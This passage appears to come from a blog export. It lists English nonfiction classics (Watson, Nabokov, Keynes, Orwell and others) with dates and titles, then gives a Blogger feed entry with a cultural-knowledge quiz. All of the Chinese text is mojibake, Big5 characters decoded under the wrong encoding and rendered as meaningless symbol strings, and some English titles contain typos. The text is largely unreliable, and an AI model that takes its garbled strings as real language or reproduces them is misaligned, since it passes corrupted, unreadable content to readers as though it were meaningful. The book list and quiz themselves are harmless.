    13. -¬°ך¿ע¶ַ¥ֽ׫¾ַ®a¡@µ״¯S¥ֽ¡@James D. Watson, 1928-¡@¡mֲשֱ³±¡n¡@The Double Helix -
      -
    14. -
    15. «X¸ַ¬ִy§@®a¡@¯ַ₪¬ל₪ׂ¡@Vladimir Nabokov, 1899-1977¡@¡m»¡§a¡I°O¾׀¡n¡@Speak, Memory -
      -
    16. -
    17. ¬°ך»y¨¥¾ַ®a¡B·s»D°O×ּ¡@©s×ײ¡@H. L. Mencken, 1880-1956¡@¡m¬°ך»y¨¥¡n¡@American Language -
      -
    18. -
    19. ­^°ך¸gְ¾ַ®a¡@³ֽ¦]´µ¡@John M. Keynes, 1883- 1946¡@¡m´N·~¡B§Q®§©M³f¹פ³q½׳¡n¡@The General Theory of Employment, Interest and Money -
      -
    20. -
    21. -¬°ךֲו®v¡B¬ד¨s¾ַ×ּ¡@´צ÷¿´µ¡@Lewis Thomas, 1913-1993¡@¡m₪@­׃²׃­M×÷¥ֽ©R¡n¡@The Live of a Cell -
      -
    22. -
    23. ¬°ך¥v¾ַ®a¡@¯S¯ַ¡@Frederick Jackson Turner, 1861-1932¡@¡m¬°ך¾ת¥v₪₪×÷ֳהֳ¦¦a°ֿ¡n¡@The Frontier in American History -
      -
    24. -
    25. ¬°ך¶ֲ₪H§@®a¡@µ¯S¡@Richard Wright, 1908-1960¡@¦¶ַ¡m¶ֲ₪H¨k«ִ¡n¡@Black Boy -
      -
    26. -
    27. -­^°ך₪p»¡®a¡@÷ײ´µ¯S¡@E. M. Forster, 1879-1970¡@¡m₪p»¡×÷´X­׃₪ט­±¡n¡@Aspects of the Novel -
      -
    28. -
    29. ¬°ך§@®a¡@´I¯S¡@Shelby Foote, 1916-¡@¡m«n¥_¾װ×§¡n¡@The Civil War -
      -
    30. -
    31. ¬°ך¾ת¥v¾ַ®a¡@¶נ¨ה°ׂ₪ׂ₪H¡@Barbara Tuchman, 1912-1989¡@¡m₪K₪כ×÷¬¶ֱn¡n¡@The Guns of August -
      -
    32. -
    33. ­^°ך­ץ¾ַ®a¡B×ְ·|¾ת¥v¾ַ®a¡@§B×L¡@Isaiah Berlin, 1909-¡@¡m₪Hֳ‏×÷¬ד¨s¡n¡@The Proper Study of Mankind -
      -
    34. -
    35. ¬°ך¯«¾ַ®a¡@¥§¥¬÷¸¡@Reinhold Niebuhr, 1892-1971¡@¡m₪H×÷¥»©»P©R¹B¡n¡@The Nature and Destiny of Man -
      -
    36. -
    37. ¬°ך¶ֲ₪H§@®a¡@ְj¼w·ֵ¡@James Baldwin, 1924-1988¡@´²₪ו¶°¡m₪g¥ֽ₪l¥¾°O¡n¡@Notes of a Native Son -
      -
    38. -
    39. ¬°ך«e½ֳ¬£₪k§@®a¡@´µ©Z¦]¡@Gertrude Stein, 1874-1946¡@¡m·RִR´µ¡DB¡D¦«§J©װ´µ×÷¦¶ַ¡n¡@The Autobiography of Alice B. Toklas -
      -
    40. -
    41. ¬°ך­^₪ו±׀±ֲ¡@¥v©}§J¡@William Strunk, 1869-1946¡@­לµ¡A§@®aֳh¯S¡@E. B. White¡A 1899-1985¡@¼W­q¡m­^₪ו¼g§@×÷­·®ז»P­n¯ְ¡n¡@The Elements of Style -
      -
    42. -
    43. ·ח¨ו¸gְ¾ַ®a₪־×ְ·|¾ַ®a¡@¦ּ¹F÷¸¡@Gunnar Myrdal, 1898-1987¡@¡m¬°ךֳרֳD¡G¶ֲ₪H°ֳD»P²{¥N¥ֱ¥D¡n¡@An American Dilemma: the Negro Problem and Modern Democracy -
      -
    44. -
    45. ­^°ך¼ֶ¾ַ®a¡B±׀¨|®a¡B§־₪W¾ַ®a¡@ֳh¼w®¡@Alfred North Whitehead, 1861-1947¡@»P­ץ¾ַ®aֳ¹¯ְ¡@Bertrand Russell, 1872-1970¡@¦Xµ¡m¼ֶ¾ַ­ל²z¡n¡@Principia Mathematica -
      -
    46. -
    47. ¬°ך¥j¥ֽ׫¾ַ®a¡B¦a½ט¾ַ±׀±ֲ¡@¥j÷¸¼w¡@Stephen Jay Gould,1941-¡@¡m₪H×÷₪£¥i´ת¶q¡n¡@The Mismeasure of Man -
      -
    48. -
    49. -¬°ך­^»y±׀¨|¾ַ×ּ¡@¨ָ§B©װ©i´µ¡@Meyer Howard Abrams, 1912-¡@¡mֳט»P¿O¡J®צ÷©²z½׳»P§וµ¶ַ²־¡n¡@The Mirror and the Lamp: Romantic Theory and Critical Tradition¡@ -
      -
    50. -
    51. ­^°ך°×«¾ַ®a¡@±צ¹F¨U¡@Peter B. Medawar, 1915-1987¡@¡m·»¸ׁ×÷§³N¡n¡@The Art of the Soluble -
      -
    52. -
    53. -¼w¸ַ¬ִy¥ֽ׫¾ַ®a¡@ְN÷¸¦h§B¡@Bert Holldobler, 1936-¡@»P¬°ך¥ֽ׫¾ַ®a¡@«ֲ÷¸»¹¡@Edward O. Wilson, 1929-¡@¦Xµ¡mֳֳֶ‏¡n¡@The Ants -
      -
    54. -
    55. ¬°ך­ץ¾ַ®a¡@ֳ¹÷¸´µ¡@John Rawls, 1921-¡@¡m¥¿¸q×÷­ל²z¡n¡@A Theory of Justice -
      -
    56. -
    57. ¶ר¸ַ­^ִyְֳ³N¥v¾ַ×ּ¡@ֵַ¥¬·ח§J¡@Ernest H. Gombrich, 1909-¡@¡mְֳ³N»P₪¶H¡n¡@Art and Illusion -
      -
    58. -
    59. ­^°ך×ְ·|¥v¾ַ®a¡@´צ´¶»¹¡@E. P. Thompson, 1924-1993¡@¡m­^°ך³ׂ₪u¶¥¯ֵ×÷§־¦¨¡n¡@The Making of the English Working Class -
      -
    60. -
    61. ¬°ך¶ֲ₪H×ְ·|¾ַ®a¡@§ש¥]´µ¡@W. E. B. Du Bois, 1868-1963¡@¡m¶ֲ₪H×÷ֶF»מ¡n¡@The Souls of Black Folk -
      -
    62. -
    63. ­^°ך­ץ¾ַ®a¡@¼¯÷¸¡@G. E. Moore, 1873-1958¡@¡m­²z¾ַ­ל²z¡n¡@Principia Ethica -
      -
    64. -
    65. ¬°ך­ץ¾ַ®a¡B±׀¨|¾ַ®a¡@§ש«ֲ¡@John Dewey, 1859-1952¡@¡m­ץ¾ַ©M₪ו©ת¡n¡]Philosophy and Civilization -
      -
    66. -
    67. ­^°ך¥ֽ׫¾ַ×ּ¡@´צ´¶¥ֽ¡@Sir D'Arcy W. Thompson, 1860-1948¡@¡m¥ֽ×ר»Pֵי§־¡n¡]On Growth and Form¡^ -
      -
    68. -
    69. ¼w¸ַ¬ִy׫²z¾ַ®a¡@·R¦]´µ©Z¡@Albert Einstein, 1879-1955¡@¡m·§©ְ»P§Pֲ_¡n¡@Ideas and Opinions -
      -
    70. -
    71. ¬°ך¾ת¥v¾ַ×ּ¡@¬Iµ¨¯®ז¡@Arthur Schlesinger, 1888 -1965¡@¡m³ַ§J»¹®ֹ¥N¡n¡@The Age of Jackson -
      -
    72. -
    73. ¬°ך§@®a¡@ֳ¹±o´µ¡@Richard Rhodes, 1937-¡@¡m­ל₪l¼u×÷»s§@¡n¡@The Making of the Atomic Bomb -
      -
    74. -
    75. ·R÷¸ִץ₪k°O×ּ¡Bµ½׳®a¡@«ֲµ·¯S¡@Dame Rebecca West, 1892-1983¡@¡m¶ֲ¯ּ¦ֿ»P¦ֲַyֶN¡n¡@Black Lamb and Grey Falcon -
      -
    76. -
    77. ·R÷¸ִץ¸ײ₪H¡B¼@§@®a¡@¸­·O¡@W. B. Yeats, 1865-1939¡@¡m¦¶ַ¡n¡@Autobiographies -
      -
    78. -
    79. ­^°ך¬ד¨s₪₪°ך¬ל¾ַ¥v¾ַ×ּ¡@§ץ¬ש·ז¡@Joseph Needham, 1900-1995¡@¡m₪₪°ך₪§¬ל¾ַ»P₪ו©ת¡n¡@Science and Civilization in China -
      -
    80. -
    81. ­^°ך¸ײ₪H¡@®ז¹p₪ׂ´µ¡]Robert Graves, 1895-1985¡^×÷²ִ₪@¦¸¥@¬ֹ₪j¾װ¦^¾׀¿‎¡m¦V₪@₪ֱ§i§O¡n¡]Goodbye to All That¡^ -
      -
    82. -
    83. ­^°ך§@®a¡@¼«ֲ÷¸¡]George Orwell, 1903-1950¡^×÷¡m¦V¥[®ץ¶©¥§¨ָ­P·q¡n¡]Homage to Catalonia¡^ -
      -
    84. -
    85. ¬°ך§@®a¡@°¨§J¦R·ֵ¡]Mark Twain, 1835-1910¡^×÷¡m¦¶ַ¡n¡]The Autobiography of Mark Twain¡^ -
      -
    86. -
    87. ¬°ך÷כ¯«ֲוְר¾ַ×ּ¡@±F÷¸¯ק¡]Robert Coles, 1929-¡@¡^×÷¡m¦M¾קֲא±₪§¨אµ£¡J«i®נ»Pִ©ָ₪§¬ד¨s¡n¡]Children of Crisis: a Study of Courage and Fear¡^ -
      -
    88. -
    89. -­^°ך¾ת¥v¾ַ®a¡@´צ®¦₪ס¡]Arnold J. Toynbee, 1889-1975¡^×÷¡m¾ת¥v×÷¬ד¨s¡n¡]A Study of History¡^ -
    90. ¬°ך¸gְ¾ַ®a¡@»\§B·ח´µ¡]John Kenneth Galbraith, 1908-¡@¡^×÷¡m´I¸־×ְ·|¡n¡]The Affluent Society¡^ -
      -
    91. -
    92. ¬°ך«e°ך°ָ­כ¡@¦ד«´»¹¡]Dean Acheson, 1893-1971¡^×÷¦^¾׀¿‎¡m°ׁ»P³׀³y¥@¬ֹ¡n¡]Present at the Creation¡^ -
      -
    93. -
    94. ¬°ך§@®a¡B¹qµר¸`¥״¥D«ש₪H¡@³ֱ®w¬¥₪ׂ¡]David McCullough, 1933-¡@¡^×÷¡m₪j¾פ¡n¡]The Great Bridge¡^ -
      -
    95. -
    96. ¬°ך₪וְֳµ½׳®a₪־´²₪ו§@®a¡@«ֲ÷¸»¹¡]Edmund Wilson, 1895-1972¡^×÷¡m¬°°ך®a¬y¦ו¡n¡]Patriotic Gore¡^ -
      -
    97. -
    98. ¬°ך₪ו¾ַ¶ַ°O§@®a¡@₪¯S¡]Walter Jackson Bate, 1918-¡@¡^×÷¡m¶כֱ[÷¸?¬ש¿«¥ֽ¡n¡]Samuel Johnson¡^ -
      -
    99. -
    100. ¬°ך§@®a¡@«¢¹p¡]Alex Haley, 1921-1992¡^»P¶ֲ₪H»ג³S¡@³ֱ±d©i?X¡]Malcolm X, 1925-1965¡^¦Xµ×÷¡m³ֱ±d©i?X¦¶ַ¡n¡]The Autobiography of Malcolm X¡^ -
      -
    101. -
    102. ¬°ך·s»D°O×ּ¡@¥מ₪ׂ¡]Tom Wolfe, 1931-¡@¡^×÷¡m₪׃×ֵ­^¶¯¡n¡]The Right Stuff¡^ -
      -
    103. -
    104. ­^°ך¶ַ°O§@®a¡@¥q¯S¹p©_¡]Lytton Strachey, 1880-1932¡^×÷¡m÷¦h§Q¨ָ₪k₪‎®ֹ¥N¥|¦W₪H¶ַ¡n¡]Eminent Victorians¡^ -
      -
    105. -
    106. ¬°ך§@®a¡B₪f­z¾ת¥v¾ַ®a¡@¼w§J÷¸¡]Studs Terkel, 1912-¡@¡^×÷¡m³ׂ°¡n¡]Working¡^ -
      -
    107. -
    108. ¬°ך§@®a¡@¥v®ץ¶©¡]William Styron, 1925-¡@¡^×÷¡m¶ֲ·tµרִ±¡n¡]Darkness Visible¡^ -
      -
    109. -
    110. ¬°ך₪ו¾ַµ½׳®a¡@¯S§Q­ג¡]Lionel Trilling, 1905-1975¡^×÷¡m₪£±a°¾¨£×÷·Q¹³¡n¡]The Liberal Imagination¡^ -
      -
    111. -
    112. ­^°ך«e­÷¬¡@×פ¦N÷¸¡]Winston Churchill, 1874-1965¡^×÷¡m₪G¦¸¥@¬ֹ₪j¾װ¦^¾׀¿‎¡n¡]The Second World War¡^ -
      -
    113. -
    114. ₪¦³ֱ₪k§@®a¡@₪¦©g»¹¡]Isak Dinesen, 1885-1962¡^×÷¡m»·ֲק«D¬w¡n¡]Out of Africa¡^ -
      -
    115. -
    116. ¬°ך¥v¾ַ®a¡@°¨­¡]Dumas Malone, 1892-1986¡^×÷¡m³ַ¦ע»¹©M¥L×÷®ֹ¥N¡n¡]Jefferson and His Time¡^ -
      -
    117. -
    118. ¬°ך¸ײ₪H¡@«ֲ·G´µ¡]William Carlos Williams, 1883-1963¡^×÷´²₪ו¶°¡m¬°ך©®ז¡n¡]In the American Grain¡^ -
      -
    119. -
    120. ¬°ך¦µM«Oֵ@§@®a¡@¿א´µ¯ַ¡]Marc Reisner, 1948-¡@¡^×÷¡m¥d­}©װ§J¨F÷z¡n¡]Cadillac Desert: the American West and Its Disappearing Water¡^ -
      -
    121. -
    122. ¬°ך±Mִז§@®a¡@₪ֱ¿ױ¡]Ron Chernow, 1949-¡@¡^×÷¡m¼¯®₪§®a¡n¡]The House of Morgan¡^ -
      -
    123. -
    124. ¬°ך·s»D°O×ּ¡@¿א§B¹ח¡]A. J. Liebling, 1904-1963¡^×÷¡m¼פ½m×÷§³N¡n¡]Sweet Science¡^ -
      -
    125. -
    126. ­^°ך­ץ¾ַ®a¡@₪§B¡]Karl Popper, 1902-1994¡^×÷¡m¶}©ס×ְ·|₪־¨ה¼ִ₪H¡n¡]Open Society and Its Enemies¡^ -
      -
    127. -
    128. ­^°ך₪ו₪ֶ¥v¾ַ×ּ¡@¸­×¡]Frances A. Yates, 1899-1981¡^×÷¡m°O¾׀×÷ְֳ³N¡n¡]The Art of Memory¡^ -
      -
    129. -
    130. ­^°ך¸gְ¥v¾ַ×ּ¡@¦«¥§¡]R. H. Tawney, 1880-1962¡^×÷¡m©v±׀»P¸ך¥»¥D¸q×÷¿³°_¡n¡]Religion and the Rise of Capitalism¡^ -
      -
    131. -
    132. ¬°ך·s»Dµ½׳®a¡@§ץ´¶°ׂ¡]Walter Lippmann, 1889-1974¡^×÷¡m¹D¼w§ַ½׳¡n¡]A Preface to Morals¡^ -
      -
    133. -
    134. ­^°ך¥v¾ַ®a¡@¥v´÷¾E¡]Jonathan D. Spence, 1936-¡@¡^×÷¡m×¾ֳׁ¥ק₪l»P₪₪°ך­²©R¡n¡]The Gate of Heavently Peace: the Chinese and Their Revolution¡^ -
      -
    135. -
    136. -¬°ך­ץ¾ַ®a¡@₪ױ®¦¡]Thomas S. Kuhn, 1922-1996¡^×÷¡m¬ל¾ַ­²©R×÷µ²÷c¡n¡]The Structure of Scientific Revolutions¡^ -
      -
    137. -
    138. ¬°ך¾ת¥v¾ַ®a©M±׀¨|®a¡@¥מ¼w¨U¼w¡]C. Vann Woodward, 1908-¡@¡^×÷¡m¦N©i¡@§J³ׂ×÷©_²§¥ֽ¥­¡n¡]The Strange Career of Jim Crow¡^
    139. ¬°ך¥v¾ַ®a¡@³ֱ¥§÷¸¡]William H. McNeill, 1917-¡@¡^×÷¡m¦ט₪ט×÷¿³°_¡n¡]The Rise of the West¡^ -
      -
    140. -
    141. ¬°ך©v±׀¾ת¥v¾ַ®a¡@¨״¦N¨אµ·¡]Elaine Pagels, 1943-¡@¡^×÷¡m¿ױ´µ´ְ±׀×÷÷ײ­µ¡n¡]The Gnostic Gospels¡^ -
      -
    142. -
    143. ¬°ך₪ו¾ַ¬ד¨s×ּ¡@®J÷¸°ׂ¡]Richard Ellmann, 1918-1987¡^×÷¡m¸ג©i´µ?³ל¥ל´µ¡n¡]James Joyce¡^ -
      -
    144. -
    145. ­^°ך¶ַ°O§@®a¡@¶ץ¼w¨u¡B¥v±Kµ·¡]Cecil Woodham-smith, 1896-1977¡^×÷¡m«n₪B®ז÷¸¶ַ¡n¡]Florence Nightingale¡^ -
      -
    146. -
    147. ¬°ך§@®a¡@´Iֱֲ÷¸¡]Paul Fussell, 1924-¡@¡^×÷¡m₪j¾װ©M²{¥N×÷°O¾׀¡n¡]The Great War and Modern Memory¡^ -
      -
    148. -
    149. ¬°ך₪H₪ו¾ַ×ּ¡@©s÷ײ¼w¡]Lewis Mumford, 1895-1990¡^×÷¡m¾ת¥v¦W«°¡n¡]The City in History¡^ -
      -
    150. -
    151. ¬°ך¾ת¥v±׀¨|¾ַ×ּ¡@³ֱ§J¦ע´ֻ¡]James M. McPherson, 1936-¡@¡^×÷¡m©I³¦¥ׁ₪§¾װ¡n¡]Battle Cry of Freedom: the Civil War¡^ -
      -
    152. -
    153. ¬°ך¶ֲ₪H»ג³S¡@×ק®¦¡]Martin Luther King, 1929-1968¡^×÷¡m¬°¬ֶ»ע§­ּ₪£¯אµ¥«¡n¡]Why We Can't Wait¡^ -
      -
    154. -
    155. ¬°ך¾ת¥v¾ַ®a¡@²צ§Q´µ¡]Edmund Morris, 1940-¡@¡^×÷¡m­}¶ר¦h?ֳ¹´µ÷ײ₪§±U°_¡n¡]The Rise of Theodore Roosevelt¡^ -
      -
    156. -
    157. ¼w¸ַ¬ִy¬³N¥v¾ַ®a¡@©¬¿ױ₪ׂ´µ°ע¡]Erwin Panofsky, 1892-1968¡^×÷¡m¸t¹³µe×k¬ד¨s¡n¡]Studies in Iconology¡^ -
      -
    158. -
    159. ¬°ך­x¨ֶ¾ת¥v¾ַ®a¡@°ע®¡]John Keegan, 1934-¡@¡^×÷¡m¾װ§׀×÷₪@­±¡n¡]The Face of Battle¡^ -
      -
    160. -
    161. ­^¸ַ¬ִy§@®a¡@₪¦³ַµב÷¸¼w¡]George Dangerfield, 1904-1987¡^×÷¡m¦¥ׁ­^°ך×÷©_²§₪§₪`¡n¡]The Strange Death of Liberal England¡^ -
      -
    162. -
    163. ­^°ךµe®a¡@°×₪ו¡]Lawrence Gowing, 1918-1991¡^×÷¡m²ִץ­·«Uµe®a¢w¥±¬÷¸¡n¡]Vermeer¡^ -
      -
    164. -
    165. ¬°ך·s»D°O×ּ¡B§@®a¡@®u÷~¡]Neil Sheehan, 1936-¡@¡^×÷¡m«GִR×÷ְֱ¨¥¡n¡]A Bright Lie: John Paul Vann and American in Vietnam¡^ -
      -
    166. -
    167. ­^°ך₪k­¸¦ז¥‎¾W¡@÷¿ָֿ²[¡]Beryl Markham, 1902-1986¡^×÷¡m­¼©]¦V¦ט¡n¡]West with the Night¡^ -
      -
    168. -
    169. ¬°ך§@®a¡@¨U÷¸₪ׂ¡]Tobias Wolff, 1945-¡@¡^×÷¡m³o¨k«ִ×÷₪@¥ֽ¡n¡]This Boy's Life¡^ -
      -
    170. -
    171. ­^°ך¼ֶ¾ַ®a¡@«¢¥N¡]G. H. Hardy, 1877-1947¡^×÷¡m₪@­׃¼ֶ¾ַ®a×÷§i¥ױ¡n¡]A Mathematician's Apology¡^ -
      -
    172. -
    173. ¬°ך׫²z¾ַ®a¡@¶O°ׂ¡]Richard P. Feyman, 1918-1988¡^×÷¡m׫²z×÷÷כֵט¡n¡]Six Easy pieces; Essentials of Physics, Explained by Its Most Brilliant Teacher¡^ -
      -
    174. -
    175. ¬°ך§@®a¡@¨f©װ¼w¡]Annie Dillard, 1945-¡@¡^×÷¡m³»§JֶW×÷²M±׀®{¡n¡]Pilgrim at Tinker Creek¡^ -
      -
    176. -
    177. -­^°ך₪Hֳ‏¾ַ®a¡@¥±µ»פ¡]James George Frazer, 1854-1941¡^×÷¡m×ק×K¡n¡]The Golden Bough¡^ -
      -
    178. -
    179. ¬°ך§@®a¡@®J§Q´ֻ¡]Ralph Ellison, 1914-1994¡^×÷¡m¼v₪l©M°§@¡n¡]Shadow and Act¡^ -
      -
    180. -
    181. ¬°ך§@®a¡@¥d¬¥¡]Robert A. Caro, 1936-¡@¡^×÷¡mֵv₪O×÷¸g¬צ₪H¡n¡]The Power Broker¡^ -
      -
    182. -
    183. ¬°ך¾ת¥v¾ַ®a¡@ְN₪ׂ´µ¹F¼w¡]Richard Hofstadter, 1916-1970¡^×÷¡m¬°ך¬F×v¶ַ²־¡n¡]The American Political Tradition¡^ -
      -
    184. -
    185. ¬°ך¾ת¥v±׀¨|¾ַ×ּ¡@«ֲ·G´µ¡]William Appleman Williams, 1921-1990¡^×÷¡m¬°ך¾ת¥v₪§½¹ר¡n¡]The Contours of American History¡^ -
      -
    186. -
    187. ¬°ך§@®a¡B½s¿ט¡@§Jֳ¹§Q¡]Herbert Croly, 1869-1930¡^×÷¡m¬°ך¥ֽ¬¡×÷«e³~¡n¡]The Promise of American Life¡^ -
      -
    188. -
    189. ¬°ך§@®a¡@¥d×i¯S¡]Truman Capote, 1924-¡@¡^×÷¡m§N¦ו¡n¡]In Cold Blood¡^
    190. ¬°ך§@®a¡@÷¿±d©i¡]Janet Malcolm,¡H-¡@¡^×÷¡m·s»D°O×ּ©M¿ׁ±‏¥ַ¡n¡]The Journalist and the Murderer¡^ -
      -
    191. -
    192. ¬°ך­ץ¾ַ±׀¨|¾ַ×ּ¡@«¢×ק¡]Ian Hacking, 1936-¡@¡^×÷¡m©R¹B×÷¹¥×A¡n¡]The Taming of Chance¡^ -
      -
    193. -
    194. ¬°ך§@®a¡@©װ¹¯S¡]Anne Lamott, 1954-¡@¡^×÷¡m¾§@«¾ֹ¡J§^¨א²ִ₪@¦~×÷₪י»x¡n¡]Operating Instructions: a Journal of My Son's First Year¡^ -
      -
    195. -
    196. ­^°ך¶ַ°O§@®a¡@¦טֱֹ÷¸¡]Lord David Cecil, 1902-1986¡^×÷¡m±צ÷¸¥»¾±ְן¡n¡]Melbourne¡^
    197. -
    -
    -
    ¡i­ל₪ו¥X³B¡jhttp://www.ncl.edu.tw/pub/c_news/81/8.html -
    -
    -
    -
    -false -
    - - - -Letter Lego - -2004-11-28T23:34:09+08:00 -2004-12-03T03:56:09Z -2004-11-28T15:47:35Z - -tag:blogger.com,1999:blog-7678098.post-110165685559775168 -§ץ®a¦P×÷¡y₪H₪ו¯ְ¾i¡z¸ױֳD -₪T₪Q­׃¦Wµ¡G¦b¨C₪@­׃¦Wµ«ב­±¼g₪U₪@¥y³ֲּ²³ז×÷¸ְִׁ¡C <br /><span class="fullpost"> <br /><li>¨f¡@§ף¡@´µ <br />¡@­^°ך₪p»¡®a¡Aµ¦³¡m©tֲתֳ‏¡n¡F¡q₪p®נ°]¯«¡r¡C <br />¡@¡]³£¬O₪p®ֹ­װֵ××÷§ן¼g¥»¡^ <br />¡@ <br /><li>¥ױ¡@¥‎¡@«i <br />¡@·ם¥Nµ״₪ו§@®a¡A¡q¹C¶יֵו¹¡r×÷·Nֳׁ¬y¼g×k¡F¡qִ^₪l¡r×÷¦P§׃±¡·Rֵיµפ¡C <br />¡@¦¬¿‎©ף¡m¥x¥_₪H¡n¡A´y¼gִA¨K¬yֲק¼ָ©~¥x¥_×÷₪H¥ֽ¦÷A¡C <br />¡@ <br />¡@ <br /><li>¨³£¡@±ר¬ש <br />¡@¦U₪u·~°ך×÷°ך»¨ף©w¡A₪G®ס₪ֶ÷ׂ±ֶ©ס³v¦~´מ¶q¡A¥H´מ½w¦a²y·ֵ«ַ®ְִ³¡C <br />¡@¬°ך¦³·N¹H¬ש¡C <br />¡@¡]§°O±o×÷¬O¨³£ִ³©w®ׁ¡^ <br />¡@ <br /><li>₪י₪÷¥ֻ₪½¬ש <br />¡@¾װ®ֹ»µ½«¾װ«R»P¯f±w¡C <br />¡@ <br />¡@ <br /><li>¯ֳ­³ש₪j¼f <br />¡@₪G¦¸¾װ«ב¡A°ך»ֱp¦X¼f§P¯ַ÷י×÷»\¥@₪׃«O¡C <br />¡@¡]¦b¬°ך¦n¹³₪S₪°_₪@³ץ¡y¯ַ÷י¡z®£©ֶ¡^ <br />¡@ <br /><li>ֲש¡@«°¡@°O <br />¡@°O±װ×k°ך₪j­²©R®ֹ´ֱ×÷ֲש«°¡F­´°¡A₪¾₪¡C <br />¡@¡]ְ³¸׃¬¹L§ן¼g¥»¡A₪£¹L¨Sװ£¦L¶H¡^ <br />¡@ <br /><li>®ד¥i₪ׂ´µ°ע <br />¡@«X°ך¥j¨ו­µ¼ײ®a¡Cµ¦W§@«~¡G₪ֳׁZ´ע¡A÷־¬₪H×ֱ¢»R¼@¡F₪־₪@₪K₪@₪G§ַ¦±¡C <br />¡@¡]§¦₪v¬O§ג¥L₪ְֳ‏¦b·s¥j¨ו¼ײ¬£¡^ <br />¡@ <br /><li>¥ױ¡@ִH¡@°O <br />¡@ <br />¡@¡]¨S¿³½ל¡A©ׂ¥H₪@×½¨S¬¡^ <br />¡@ <br /><li>°×¡@÷¸¡@°ע <br />¡@«X°ך§@®a¡C <br />¡@¡]¦n¹³¦³¬צ©ְ₪½¶י¡A¨ה¹ך§°O±o×÷¬O¦³₪@³¡¥H°×÷¸°ע₪½¶י¬°ֳD×÷¶¡¿ׂ₪p»¡¡^ <br />¡@ <br /><li>°ע«׳₪s®¦₪³°O <br />¡@ <br />¡@¡]±ֲI¼g¡^ <br />¡@ <br /><li>שװ¡@×k¯S <br />¡@ <br />¡@¡]±ֲI¼g¡A₪Q₪@₪כ®ֹ§יִֻ¦n₪[ֱ`÷ג¦÷¦¨¡^ <br />¡@ <br /><li>®¦¡@¶©¡@®׳ <br />¡@ <br />¡@¡]ֵ¥¹L¡A¨Sװ£¦L¶H¡A¦A·Q·Q¡^ <br />¡@ <br /><li>₪‎¡@₪ו¡@¿³ <br />¡@¥x₪j¥~₪ו¨t²¦¡A·ם¥N₪p»¡®a¡Cµ¦³¡m®aֵ¡n¡A¦­¦~₪ו¦r­·®ז¥H©ַ₪ו²§¦r¸׳©}ֱm₪תµ¦W¡C <br />¡@ <br />¡@ <br /><li>ְ±¡@ֱֹ¡@¨ָ <br />¡@ֱת¼w÷¸§@«~¡A²׳¦±¬°µ¦W×÷¡q«¢§Q¸פ¨ָ¡r¡C <br />¡@¡]¸t½ֿ°²´ֱ¥²ֵ¥¡A§«³ֵw¡^ <br />¡@ <br /><li>¶ְ¡@¬K¡@©ת <br />¡@ <br />¡@¡]×¾¹D₪׃¦h¡A¾ד²z₪@₪U¦A¼g¡^ <br />¡@ <br /><li>ְ¹¡@°×¡@¼ײ <br />¡@×k°ךֱ`²־¡C <br />¡@ <br />¡@ <br /><li>¦‎¡@¡@¡@₪B <br />¡@¯«¦±§@×ּ¡C <br />¡@ <br />¡@ <br /><li>ֲֲ¡@¡@¡@¬ש <br />¡@°ע·‏±׀¸t¸g¡A´y­z±q³׀¥@¬צ¨ל°ע·‏×@₪ׁ₪§¶¡×÷¨ֶ¥ף¡F₪ס·s¬ש¨ד¦³¬G¨ֶ©¡C <br />¡@ <br />¡@ <br /><li>¥׀¶י¥זֵT¦± <br />¡@¨©¦h×ג²ִ¥|¸¹¥זֵT¦±₪§³q÷¡F´y­z₪ָ«ב¥׀¶י¥ׁ«ןְR¦¼ֹ«B¦׃¦A«׳²»©M×÷§@«~¡C <br />¡@ <br />¡@ <br /><li>±i¡@·R¡@¬ֲ <br />¡@·ם¥Nµ״₪ו®¬£₪k§@®a¡A¼vֵT«ב«l¬ֶ²`¡A¿W¦¨¡y±i¾ַ¡z¡C <br />¡@₪p»¡¡q¶ֹ«°₪§ֵ¡r¡A¡q¥b¥ֽ½t¡r¡F¹q¼v¼@¥»¡m₪׃₪׃¸U·³¡n¡A¡m₪£₪F±¡¡n¡C <br />¡@ <br />¡@ <br /><li>÷¡@¥ֻ¡@²ִ <br />¡@¸q₪j§Q₪p´£µ^®a₪־§@¦±®a¡C§@«~¡m¥|©u¡n¬°µ¦W₪p´£µ^¨ף«µ¦±¡C <br />¡@ <br />¡@ <br /><li>¼wֱ¢²ן­׳₪k <br />¡@²׳¨­©^ִm©ף²ִ₪T¥@¬ֹ°ך®a¡A­P₪O·׃ֵU³h¥ֱ×÷₪k₪h¡C <br />¡@ <br />¡@ <br /><li>¦ּ¶}®װ°עֳ¹ <br />¡@₪וְֳ´_¿³®ֹ´ֱ₪T₪j®a₪§₪@¡F§@«~¥H₪j«¬¾ְµe¬°¥D¡C <br />¡@ <br />¡@ <br /><li>¾װ×§»P©M¥­ <br />¡@«X°ך§@®a¦«÷¸´µ®ץ§@«~¡C <br />¡@¡]₪j³¡ְY¡A¨S¿³½ל©ׂ¥H¨S¬¡^ <br />¡@ <br /><li>»·ֳֳ¡@©P§@ <br />¡@₪י¥»§@®a¡Aµ¡m²`×e¡n¡C <br />¡@¡]´X¦~«e´N¶R₪F¡A¬₪£₪U¥h¡^ <br />¡@ <br /><li>§B¡@§Q¡@«ם <br />¡@­C¿q°ע·‏½ֿ¥ֽ₪§«°¡C <br />¡@ <br />¡@ <br /><li>¬ל¯ֱ¥ס¾װ×§ <br />¡@ <br />¡@¡]¬ל¯ֱ¨U¡H¡^ <br />¡@ <br /><li>¿c¡@¦w¡@¹F <br />¡@ <br />¡@¡]₪@­׃₪p°ך¡^ <br />¡@ <br /><li>·¨¡@®¶¡@¹ח <br />¡@µ״₪H¿ױ¨©÷¸×«²z¼ת±o¥D¡C <br />¡@ <br />¡@ <br /><li>»a¡@ֳַ¡@₪‎ <br />¡@₪@₪E₪K¥|¦~¿ױ¨©÷¸₪ו¾ַ¼ת±o¥D­^°ך§@®a«ֲ·G°×₪B§@«~¡C <br />¡@¦b©t®q₪W×÷₪ײ¦~¹־ֵי×÷×§ֵv¡A¥H₪־¹ן¦µM½ב₪©¯«ֵ]₪§©×÷¬G¨ֶ¡C <br />¡@¡]¦n¬¡A¹q¼v₪£«ח¼ֻ¡^ <br />¡@</li> <br /><hr> <br />³o¼ֻ°µµ×¯u¬O²ײ¡A±ֲI¦A¸ֹ₪W¨ה¥L×÷µ×®׳¡C <br />¦©ף¥¿½Tµ×®׳¡H§§@µ×§¹²¦¦A§ה§a¡I <br /></span> -false - -
